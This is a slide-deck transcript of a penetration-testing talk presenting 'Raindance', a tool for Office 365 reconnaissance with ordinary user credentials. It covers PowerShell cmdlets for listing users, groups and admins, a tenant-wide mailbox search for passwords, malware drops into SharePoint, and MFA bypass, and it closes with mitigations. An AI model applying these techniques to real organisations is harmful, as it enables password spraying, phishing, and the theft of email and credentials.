240 likes | 264 Views
Explore the unique features of Microsoft Office 365 accessible to admins and learn how attackers can exploit user privileges to gain access without breaking the perimeter. Discover the power of PowerShell and Office REST API for critical data extraction, domain compromises, and more. Stick around for insights from forensics experts.
E N D
Raindance Raining Recon from the Microsoft Cloud Presented by Michael Stringer
Introductions • Following the path of penetration testing & exploit development since 2010 • Wrote The Hacker Ethos, a beginner’s guide book for learning ethical hacking • Enjoys writing things like books, blogs, and things (weird, right?) • Generally having a good time breaking stuff, pentesting & writing code Mike Stringer Research Analyst Penetration Tester Malware Research Computer Forensics Journeyman of Python Zen Open Source Contributor
Got some fun stuff to share … • Microsoft Office 365 has some unique features reserved for admins… except admins aren’t the only ones with access. • Another example of why user privileges are more powerful than you might assume • Powershell & the Office REST API have interesting features that most admins know about that attackers don’t. • In the best/worst cases, you can grab critical data or gain a domain compromise without ever having broken the perimeter. • The Forensics guys might wanna stick around ;)
A little about Exchange & Office 365 Exchange On-Premises Office 365 A.K.A. ”the cloud lifestyle” Email remotely accessible from anywhere using email address No local domain required Comes with SharePoint/OneDrive access, accessible from anywhere Configurable from anywhere Office 365 management via PowerShell from … anywhere! • Only SMTP is accessible with user creds • Requires local-domain for login • Only provides access to email remotely (no file access) • Usually must be configured on local network • Local network management access via PowerShell
Accessing the Cloud via PowerShell is cool! Basic Office 365 login • Gaining access to the cloud via PowerShell was always intended to be easy for administrators to do & automate their work. • Exchange & O365 always provided the ability to manage the system via PowerShell. • Easily allows automation & management of users, licenses password resets, emails, logs & SharePoint content. • Very awesome for Admins, except for one problem… Scripted Microsoft Exchange / Office 365 login
Anyone can do it… • By default, all users have access to Office 365 & Exchange via PowerShell with read-access to domain information. • Not a problem in an on-premises environment, but the cloud (accessible from anywhere) is another story. • Any user can read anything about the Office 365 tenant that is available to them, which is a lot. • Conclusion: If an attacker guesses credentials to just one user, it can be a gateway into the network without ever touching the perimeter.
ME: Hey Microsoft, can you tell me this company’s domain information?MS: Naturally. Here you go. Sign in to O365 Then start gathering Information … Pull the list of domains joined to Office365 Domains joined to Office365 indicate places where SSO is in use and increases the attack surface A Federated domain indicates directory synchronization with the target’s local domain View Licenses the user has access to Licenses = Services to attack (PowerBI, Delve, Azure, and more!)
ME: Hey Microsoft, Can you tell us about this Company’s info?MS: SURE! :D The company configuration can tell us a lot about the user and target environment. SelfServePasswordReset = True UsersPermissionToX = everything the user is able to do (default: read all) DirectorySynchronization, True indicates Single Sign-On is in use. TechicalNoficiationsBet you anything that’s a DA In this environment password sync isn’t enabled, but if it was, you’d find out right here.
ME: Can I have everyone’s usernames?MS: No problem, homie! Pull a list of users with full contact details This gives us ample opportunity to use password spraying at our leisure. You also get the user’s confirmed contact information, job title, and any other info they’ve volunteered to the cloud. Good for phishing.
ME: How about all your mail groups?MS: Absolutely! Find your groups… … And who’s in ‘em Pull a list of mail/security distribution groups We can assume job-roles & departments, Pick out specific targets for phishing emails Security Group Members These can be searched through by their “object-id” value. Useful for targeting groups of likely, susceptible users
ME: What about all your security/user roles?MS: Of course! Here you go! Use Get-MsolRole to pull out a list of the groups available with permissions in Office365. Now we know the list of Office 365 permissions they have available. Wait …Whut?
Using Get-MsolRoleMember –RoleObjectId <object-id> we get a list of all the Company admins (O365 version of Domain Admin) So with just basic user credentials, we now have: • The domain structure & software in use • The entire network user list • Everyone’s contact info, job title, department, and even the last time they changed their password. • A list of the administrative users • A list of all the mailing & security groups • The freedom to view all the licenses users own
Mail at your fingertips An exchange admin has the ability to search & read user emails with syntax like so: Get-Mailbox -ResultSize Unlimited | Search-Mailbox -SearchQuery “Body:’*password*’” Searches all mailboxes the admin has access to for the word “password” in the body and Connecting to other services via powershell gives us access to… There are similar ways to connect to other services and manipulate them Email & Chat (Microsoft Exchange / Skype) Logs File Shares (SharePoint / OneDrive) Business Analytics and Data (PowerBI) Developer documentation (Delve) Security & Compliance tools (for Office 365 admins) Import a PowerShell Session to Exchange Email Pull & search emails Use administrative rights to impersonate users, then read their emails too. Read/send mail from other users as admin using Exchange WebServices API Manage mailbox rules (Remember Ruler?)
You can have your SharePoint and PWN it too You can connect using the msonline SPO commands … List out all the SP-sites that exist for a domain Show sites you have read/write access Search sites for specific terms & content Drop malicious files into SP and share the love with other users Or … You can connect using the Web Services API for more control and to manipulate files
Advantages of using PShell on a Pentest PWN 100% accurate usernames & emails Access to sharepoint gives you a trusted platform to deploy malware. List all the contact details of your targets, who the administrators are, and groups they belong to. All of this recon can be done without touching the target’s network. No need to be quiet. These are intended usages of powershell. Logs are minimal. No automated tools exist yet to alert on PowerShell usage.
Introducing Raindance Automates all that boring stuff. Simplifies the powershell syntax & information gathering process Stores all the data in handy variables for you to search/manipulate Dump all the information to a csv or txt file
Essential features of Raindance Rain-Login: Connect to Office 365 Rain-Get<?>: Get stuff Rain-Show <?>: Show stuff Rain-Dump <?>: Dump stuff to CSV or txt files Windows only for now Available on GitHub for you to use
Get & Show • Rain-GetUsers to get the list of usernames and details • Rain-GetAll to just get everything • Rain-Show users to get the user details you just pulled • You can show Users, Groups, Roles, Admins, and Gadmins(company admins) instantly
Dump your recon to a CSV Rain-DumpAll –path C:\path\to\directory When ready, Raindance can save everything into a series of .csv files for you to perform more analysis on at your leisure. The CSVs are far more verbose. Contains all information gathered, not just what appears in the powershell tables
How do I stop this attack? • Implement Multi-Factor Authentication and CORRECTLY Enforce SSO policies • Without Multi-factor authentication, the only thing keeping attackers out are one set of credentials. • The odds are against you. Sophisticated attackers will get user creds, but MFA can still stop them cold. • Require x.509 ADFS certificates to log into Office365 and Exchange • This is nearly impossible to bypass without having compromised a local system • Prevents 2-factor bypass via EWS Exchange API • Disable PowerShell access to Office 365 & Exchange for end-users • Average users don’t need PowerShell for daily work. • The legacy Exchange API allows attackers to bypass 2-factor authentication otherwise • Principle of Least Privilege!!! IT’S IMPORTANT! • Disable Office Graph and the REST API • If you aren’t a developer, you don’t need it. • REST API allows 2-factor bypass in certain OWA portals and misconfigured Federated environments
Feature Abuse is still alive thanks to Office365 Any user can disclose all of this info, any admin can control every user, and in the right conditions, the legacy Exchange API allows you to bypass MFA Take-aways These features are not likely to go away If anything, more featuresvulnerabilities will be added Pentesters: Don’t ignore the cloud as an attack surface Admins: Don’t ignore the cloud as a gaping hole in your security Feature Abuse is still a viable tactic Powershell, C#, & .NET are all viable options for attacking the cloud. It’s just a matter of finding the “features” that let it happen.
Download & Contribute to Raindance • Download from: https://github.com/True-Demon/raindance.git • I will be adding new features whenever possible • I accept donations in the form of: • Issues • Feature Requests • Pull Requests • Beer • Contact me @: • https://github.com/True-Demon • truedemon@riseup.net
This concludes our broadcast day Questions?